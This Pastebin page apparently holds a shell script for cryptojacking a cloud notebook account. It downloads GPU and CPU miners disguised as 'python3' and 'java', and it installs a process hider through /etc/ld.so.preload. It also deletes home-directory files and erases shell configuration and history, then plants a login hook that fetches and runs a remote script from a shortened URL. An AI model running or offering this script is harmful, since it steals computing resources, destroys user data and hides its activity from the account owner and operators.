Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/sh
- cd
- rm -rvf *
- echo "==================="
- echo " CEK TIMEZONE "
- echo "==================="
- echo " "
- echo " "
- ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
- dpkg-reconfigure --frontend noninteractive tzdata
- sleep 2
- apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
- sleep 3
- cd ~/
- git clone https://github.com/sukamenari/akc.git && cd akc && rm bash && wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.76/lolMiner_v1.76_Lin64.tar.gz && tar -xf lolMiner_v1.76_Lin64.tar.gz && rm lolMiner_v1.76_Lin64.tar.gz && cd 1.76 && mv lolMiner python3 && mv python3* ~/ && cd .. && rm -rvf 1.76 && mv kernel* /home/studio-lab-user/.lib
- cd ~/ && rm -rvf akc
- cd
- rm -rvf akc
- git clone https://github.com/sukamenari/akc.git && cd akc && wget https://github.com/rplant8/ccminer-KlausT-8.21-mod-r18-src-fix/releases/download/1.0.1/ccminer-rplant-yescryptr16-linux-1.0.1.tar.gz && tar -xvzf ccminer-rplant-yescryptr16-linux-1.0.1.tar.gz && mv ccminer java && mv java* ~/ && mv kernel* /home/studio-lab-user/.lib
- cd .. && rm -rvf akc
- cd
- rm -rf gas && wget -q 'https://gitlab.com/fesfap/nim/-/raw/main/gas.zip' && unzip gas.zip
- chmod +x gas
- rm -rf Makefile
- rm -rf processhider.c
- rm -rf README.md
- rm -rf .gitignore
- rm -rf gas.zip
- cd
- wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
- unzip tukimin.zip
- rm -rf tukimin.zip
- make
- gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
- mv libprocesshider.so /usr/local/lib/
- echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
- cd
- mkdir d && cd d
- wget https://gitlab.com/fesfap/nim/-/raw/main/graphics.tar.gz --no-check-certificate
- tar -xvzf graphics.tar.gz
- rm -rf graphics.tar.gz
- cd ~/
- echo "" > /home/studio-lab-user/.bashrc
- echo "" > /home/studio-lab-user/.bash_history
- echo "" > /home/studio-lab-user/.bash_profile
- echo 'echo "" >> /home/studio-lab-user/.bash_history' >> /home/studio-lab-user/.bashrc
- echo "source /home/studio-lab-user/.bash_profile" >> /home/studio-lab-user/.bashrc
- echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/studio-lab-user/.bash_profile
- echo "export LD_LIBRARY_PATH" >> /home/studio-lab-user/.bash_profile
- echo "bash /home/studio-lab-user/.lib/gas.sh" >> /home/studio-lab-user/.bash_profile &&
- echo "export LC_ALL=C; unset LANGUAGE && cd ~/ && rm -rvf e && wget -O e http://tiny.cc/GPUCC && sed -i -e 's/\r$//' e && chmod +x e && ./e " > /home/studio-lab-user/.lib/gas.sh
- cd /home/studio-lab-user/.lib/
- chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement